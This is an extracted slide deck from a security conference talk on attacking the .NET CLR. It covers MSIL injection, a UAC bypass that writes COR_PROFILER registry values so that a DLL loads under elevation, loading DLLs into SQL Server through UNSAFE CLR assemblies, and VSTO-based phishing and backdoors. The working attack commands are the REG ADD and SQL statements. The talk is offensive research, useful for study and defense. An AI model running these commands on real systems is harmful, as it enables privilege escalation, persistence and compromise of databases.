attacking microsoft .net framework through clr - yu … · clr hajacking (plan b) •install a...
TRANSCRIPT
![Page 1: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/1.jpg)
Attacking Microsoft .NET Framework through CLR
MerJersonredrain
Qihoo 360CERT
![Page 2: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/2.jpg)
Who are we
• MerJerson• 360CERT
• Security researcher
• Lead author of this paper
• Redrain• 360CERT
• security researcher
• CVE generator
• Speaker on HITB, HITCON, RUXCON, xKungfoo, Syscan360
• Member of Light4Freedom
• Co-author of this paper
• http://www.hackdog.me
![Page 3: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/3.jpg)
Who are we
• 360CERT
360Computer emergency response team is a young and powerful team setted up last year. We focus on emergency response for cyberspace upstream, malware analyzing, and threat hunting.
• http://cert.360.cn
![Page 4: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/4.jpg)
Agenda
➢ .NET Framework and CLRPrimer
Metadata and IL Code
Some points
➢ History ReviewMSIL Injection
UAC Bypass
Attack SQL Server via SQLi
➢ Learn the New by Restudying the OldVSTO in Office
Attack Office via VSTO
Exploit in a Real World
More vulnerabilities
![Page 5: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/5.jpg)
.NET Framework and CLR
![Page 6: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/6.jpg)
Primer
• Common Language Runtime (CLR)
• Metadata
• Managed Code – MSIL bytecode
![Page 7: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/7.jpg)
Metadata and the PE File Structure
![Page 8: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/8.jpg)
Metadata Table:
Def Table
Ref Table
Pointer Table
Heap
Metadata Table
![Page 9: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/9.jpg)
Metadata Tokens
![Page 10: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/10.jpg)
Write code
Machine code
run
MSIL CLR load
Managed code
![Page 11: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/11.jpg)
os
Process Process
AppDomain AppDomain
AppDomain AppDomain
AppDomain
CLR Hosting
Struct
![Page 12: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/12.jpg)
History Review
![Page 13: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/13.jpg)
• CLR Hajacking (plan A)• Hook compileMethod
• Replace IL code
• Reset pre-JITted
• CLR Hajacking (plan B)• Install trampoline
• Define a dynamic method
• Pass parameters
• Load assembly via calling customize code
• Profiling api injection • Intercept JIT
• Replace IL code
• Return new IL code to JIT
MSIL injection
![Page 14: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/14.jpg)
• Locate injection by GetMethod()
CLR Hajacking (plan A)
public MethodInfo GetMethod(string name,BindingFlags bindingAttr
)
// hook and replace JIT's compileMethodwith my ownNTSTATUS ntStatus = LhInstallHook( (PVOID&)ICorJitCompiler::s_pfnComplieMethod
, &(PVOID&)CInjection::compileMethod, NULL, &s_hHookCompileMethod);
• Hook compileMethod
![Page 15: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/15.jpg)
• Replace IL code
CLR Hajacking (plan A)
• Reset pre-JITtedvoid MethodDesc::Reset(){...ClearFlagsOnUpdate();if (HasPrecode()){GetPrecode()->Reset();}else {_ASSERTE(GetLoaderModule()->IsReflection()); InterlockedUpdateFlags2(enum_flag2_HasStableEntryPoint | enum_flag2_HasPrecode, FALSE);*GetAddrOfSlotUnchecked() = GetTemporaryEntryPoint();}_ASSERTE(!HasNativeCode());}
// find the method to be replacedstd::map< CORINFO_METHOD_HANDLE, ILCodeBuffer>::iterator iter = s_mpILBuffers.find((CORINFO_METHOD_HANDLE)pMethodDesc);if( iter != s_mpILBuffers.end() ) {tILCodeBuffer = iter->second;pCorMethodInfo->ILCode = tILCodeBuffer.pBuffer;pCorMethodInfo->ILCodeSize = tILCodeBuffer.dwSize;}CorJitResult result = pCorJitCompiler->compileMethod( pJitInfo, pCorMethodInfo, nFlags, pEntryAddress, pSizeOfCode);return result;
![Page 16: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/16.jpg)
CLR Hajacking (plan B)
• Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined method.
• Define a dynamic method that will have a specific method signature.
• Construct an array of objects that will contain the parameters passed to the method.
• Invoke a dispatcher function which will load our Assembly and will finally call our code by passing a handle to the original method and an array of objects representing the method parameters.
• Repair the Assembly
![Page 17: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/17.jpg)
MSIL injection
•Profiling API• JITCompilationStarted•GetILFunctionBody and
SetILFunctionBody•Adjustment program
![Page 18: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/18.jpg)
JITCompilationStarted
MSIL injection
HRESULT JITCompilationStarted( [in] FunctionID functionId, [in] BOOL fIsSafeToBlock);
![Page 19: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/19.jpg)
GetILFunctionBody:
MSIL injection
HRESULT GetILFunctionBody( [in] ModuleID moduleId, [in] mdMethodDef methodId, [out] LPCBYTE *ppMethodHeader, [out] ULONG *pcbMethodSize);
![Page 20: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/20.jpg)
SetILFunctionBody
MSIL injection
HRESULT SetILFunctionBody( [in] ModuleID moduleId, [in] mdMethodDef methodid, [in] LPCBYTE pbNewILMethodHeader);
![Page 21: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/21.jpg)
• Restore the runtime• Header
• Codesize
• Set header
• Status • Stack
• Heap
• Parameters
• Return address
MSIL injection
![Page 22: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/22.jpg)
Add Profiler:
set COR_PROFILER
COR_ENABLE_PROFILING
MSIL injection
set COR_PROFILER={32E2F4DA-1BEA-47ea-88F9-C5DAF691C94A} set COR_PROFILER="MyProfiler"
![Page 23: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/23.jpg)
Hook CompileMethod
Trampoline Profiling API
Injection position
Before JIT
Entry Hook compileMethod Calli trampoline JITCompilationStarted
EssenceModify itself dynamically
Calli to dispatcher function
Profiling monitor
InjectionModify
compileMethodInvoking the user
defined codeSetILFunctionBody
Scopemodify IL code itself /
couldn't add new data
invoke an arbitrary function
modify program entry
MSIL injection
![Page 24: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/24.jpg)
UAC bypass
• Set env var
• Initialize CLR
• Load profiler dll
• Bypass UAC
![Page 25: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/25.jpg)
COR_ENABLE_PROFILING=1COR_PROFILER={GUID}COR_PROFILER_PATH=C:\hitb.dll
UAC bypass
Set a env var
REG ADD "HKCUSoftwareClassesCLSID{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}InprocServer32" /ve/t REG_EXPAND_SZ /d "C:\hitb.dll" /fREG ADD "HKCUEnvironment" /v "COR_PROFILER" /t REG_SZ /d "{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}" /fREG ADD "HKCUEnvironment" /v "COR_ENABLE_PROFILING" /t REG_SZ /d "1" /fmmc gpedit.msc
PoC by powershell
![Page 26: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/26.jpg)
UAC bypass
![Page 27: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/27.jpg)
SQL Server injection
CREATE ASSEMBLY [demo] AUTHORIZATION [dbo] FROM [0x4D5A90000...] WITH PERMISSION_SET = UNSAFE;
CREATE PROCEDURE [dbo].[WirteFile] AS EXTERNAL NAME [demo].[StoredProcedures].[SQLPcd]
EXEC [dbo].[WirteFile]
![Page 28: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/28.jpg)
• Create SQL Server project via VS
• Create a custom stored procedure via CLR
• Attack SQL Server lead to load arbitrary dll
SQL Server injection
![Page 29: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/29.jpg)
CREATE ASSEMBLY [demo] AUTHORIZATION [dbo] FROM [0x4D5A90000...] WITH PERMISSION_SET = UNSAFE;
CREATE PROCEDURE [dbo].[WirteFile] AS EXTERNAL NAME [demo].[StoredProcedures].[SQLPcd]
EXEC [dbo].[WirteFile]
SQL Server injection
![Page 30: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/30.jpg)
SQL Server injection
![Page 31: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/31.jpg)
SQL Server injection
![Page 32: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/32.jpg)
CREATE PROCEDURE [dbo].[WirteFile] AS EXTERNAL NAME [demo].[StoredProcedures].[SQLPcd]
EXEC [dbo].[WirteFile]
SQL Server injection
![Page 33: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/33.jpg)
SQL Server injection
• Restrictions • CLR support enabled on SQL Server (could turn on by sql)
• Exec privilege (could be elevated by dba)
• Significance • xp_cmd_shell can’t be restore
• New way to elevation of dba privilege
• Bypass waf and AV in real world
sp_configure 'clr enable’, 1;go;reconfigure;go
alter database [dbname] set trustworthy on
![Page 34: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/34.jpg)
![Page 35: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/35.jpg)
Learn the new by restudying the old
![Page 36: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/36.jpg)
• VSTO Development
• VSTO Weak points
VSTO Attack Vectors
![Page 37: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/37.jpg)
• Excel • Workbook• Template
• InfoPath • Outlook• PowerPoint• Visio• Word
• Document• Template
VSTO Attack Vectors
![Page 38: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/38.jpg)
VSTO Attack Vectors
![Page 39: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/39.jpg)
Need to be solved:
CertificateAdditional File
VSTO Attack Vectors
![Page 40: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/40.jpg)
attrib +s +a +h +r document
VSTO Attack Vectors
![Page 41: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/41.jpg)
VSTO weakness
Documentation phishing
Persistent backdoor
![Page 42: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/42.jpg)
VSTO phishing
59, 59%
36%
5%
钓鱼文档类型
宏 漏洞 其他
Macro 59.59%Vulnerabilities exploit 36%Feature and others 5%
![Page 43: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/43.jpg)
In real world
VSTO phishing
![Page 44: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/44.jpg)
VSTO phishing
Set up a probe
![Page 45: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/45.jpg)
VSTO phishing
Result for phishingsuccess proportion
HIT MISSED
![Page 46: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/46.jpg)
VSTO phishing
![Page 47: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/47.jpg)
VSTO phishing
• Macro phishing
• 11%-14% success
• DDE phishing
• Nearly 30% success
• VSTO phishing with hidden
• Nearly 40% success
![Page 48: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/48.jpg)
VSTO Loading:• checks the registry• application loads VSTOEE.dll, which loads VSTOLoader.dll• starts the managed portion of the Visual Studio Tools for
Office runtime• security checks• check for assembly updates• creates a new application domain• loads the VSTO Add-in assembly into the application domain.
VSTO weakness
![Page 49: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/49.jpg)
VSTO Self-mechanism:
• Dll hijacking• Porfiling injection• Config hijacking
VSTO weakness
![Page 50: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/50.jpg)
More vulnerabilities
• .NET Framework include CLR
• The C# code will be translate by CLR
• Fuzz the IL code by MSIL injection
• Monitor the .NET application upstream status to judge crash/hang or not
Target.exe
callTarget.
dll
run
MSIL Fuzzer
Logger
Agent Verifier
![Page 51: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/51.jpg)
More vulnerabilities
![Page 52: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/52.jpg)
More vulnerabilities
![Page 53: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/53.jpg)
More vulnerabilities
![Page 54: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/54.jpg)
CVE-2017-0564,CVE-2017-0483,CVE-2017-0526,CVE-2017-0527,CVE-2017-0333,CVE-2017-0479,CVE-2017-0480,
CVE-2017-0450,CVE-2017-0448,CVE-2017-0436,CVE-2017-0444,CVE-2017-0435,CVE-2017-0429,CVE-2017-0428,
CVE-2017-0425,CVE-2017-0418,CVE-2017-0417,CVE-2017-0402,CVE-2017-0401,CVE-2017-0400,CVE-2017-0398,
CVE-2017-0385,CVE-2017-0384,CVE-2017-0383,CVE-2016-10291,CVE-2016-8481,CVE-2016-8480,CVE-2016-8449,
CVE-2016-8435,CVE-2016-8432,CVE-2016-8431,CVE-2016-8426,CVE-2016-8425,CVE-2016-8400,CVE-2016-8392,
CVE-2016-8391,CVE-2016-6791,CVE-2016-6790,CVE-2016-6789,CVE-2016-6786,CVE-2016-6780,CVE-2016-6777,
CVE-2016-6775,CVE-2016-6765,CVE-2016-6761,CVE-2016-6760,CVE-2016-6759,CVE-2016-6758,CVE-2016-6746,
CVE-2016-6736,CVE-2016-6735,CVE-2016-6734,CVE-2016-6733,CVE-2016-6732,CVE-2016-6731,CVE-2016-6730,
CVE-2016-6720,CVE-2016-3933,CVE-2016-3932,CVE-2016-3909,CVE-2016-5342,CVE-2016-3895,CVE-2016-3872,
CVE-2016-3871,CVE-2016-3870,CVE-2016-3857,CVE-2016-3844,CVE-2016-3835,CVE-2016-3825,CVE-2016-3824,
CVE-2016-3823,CVE-2016-3774,CVE-2016-3773,CVE-2016-3772,CVE-2016-3771,CVE-2016-3770,CVE-2016-3765,
CVE-2016-3747,CVE-2016-3746,CVE-2016-2486,CVE-2016-2485,CVE-2016-2484,CVE-2016-2483,CVE-2016-2482,
CVE-2016-2481,CVE-2016-2480,CVE-2016-2479,CVE-2016-2478,CVE-2016-2477,CVE-2016-2452,CVE-2016-2451,
CVE-2016-2450,CVE-2016-2449,CVE-2016-2448,CVE-2016-2442,CVE-2016-2441,CVE-2016-2437,SVE-2016-5393,
CVE-2015-1805,CVE-2016-0826,CVE-2016-0804,CVE-2015-8681,CVE-2015-8318,CVE-2015-8307,CVE-2015-5524,
CVE-2015-8089,CVE-2015-3869,CVE-2015-3868,CVE-2015-3865,CVE-2015-3862,CVE-2015-0573,CVE-2015-0568
Hackers:
Antonio "s4tan" Parata
cyg07@360
sweeper & d4rker @kylin team
Link:http://phrack.org/papers/dotnet_instrumentation.html
![Page 55: Attacking Microsoft .NET Framework through CLR - Yu … · CLR Hajacking (plan B) •Install a trampoline at the beginning of the code. This trampoline will call a dynamically defined](https://reader033.vdocuments.site/reader033/viewer/2022052723/5f0f00f57e708231d4420231/html5/thumbnails/55.jpg)
CVE-2017-0564,CVE-2017-0483,CVE-2017-0526,CVE-2017-0527,CVE-2017-0333,CVE-2017-0479,CVE-2017-0480,
CVE-2017-0450,CVE-2017-0448,CVE-2017-0436,CVE-2017-0444,CVE-2017-0435,CVE-2017-0429,CVE-2017-0428,
CVE-2017-0425,CVE-2017-0418,CVE-2017-0417,CVE-2017-0402,CVE-2017-0401,CVE-2017-0400,CVE-2017-0398,
CVE-2017-0385,CVE-2017-0384,CVE-2017-0383,CVE-2016-10291,CVE-2016-8481,CVE-2016-8480,CVE-2016-8449,
CVE-2016-8435,CVE-2016-8432,CVE-2016-8431,CVE-2016-8426,CVE-2016-8425,CVE-2016-8400,CVE-2016-8392,
CVE-2016-8391,CVE-2016-6791,CVE-2016-6790,CVE-2016-6789,CVE-2016-6786,CVE-2016-6780,CVE-2016-6777,
CVE-2016-6775,CVE-2016-6765,CVE-2016-6761,CVE-2016-6760,CVE-2016-6759,CVE-2016-6758,CVE-2016-6746,
CVE-2016-6736,CVE-2016-6735,CVE-2016-6734,CVE-2016-6733,CVE-2016-6732,CVE-2016-6731,CVE-2016-6730,
CVE-2016-6720,CVE-2016-3933,CVE-2016-3932,CVE-2016-3909,CVE-2016-5342,CVE-2016-3895,CVE-2016-3872,
CVE-2016-3871,CVE-2016-3870,CVE-2016-3857,CVE-2016-3844,CVE-2016-3835,CVE-2016-3825,CVE-2016-3824,
CVE-2016-3823,CVE-2016-3774,CVE-2016-3773,CVE-2016-3772,CVE-2016-3771,CVE-2016-3770,CVE-2016-3765,
CVE-2016-3747,CVE-2016-3746,CVE-2016-2486,CVE-2016-2485,CVE-2016-2484,CVE-2016-2483,CVE-2016-2482,
CVE-2016-2481,CVE-2016-2480,CVE-2016-2479,CVE-2016-2478,CVE-2016-2477,CVE-2016-2452,CVE-2016-2451,
CVE-2016-2450,CVE-2016-2449,CVE-2016-2448,CVE-2016-2442,CVE-2016-2441,CVE-2016-2437,SVE-2016-5393,
CVE-2015-1805,CVE-2016-0826,CVE-2016-0804,CVE-2015-8681,CVE-2015-8318,CVE-2015-8307,CVE-2015-5524,
CVE-2015-8089,CVE-2015-3869,CVE-2015-3868,CVE-2015-3865,CVE-2015-3862,CVE-2015-0573,CVE-2015-0568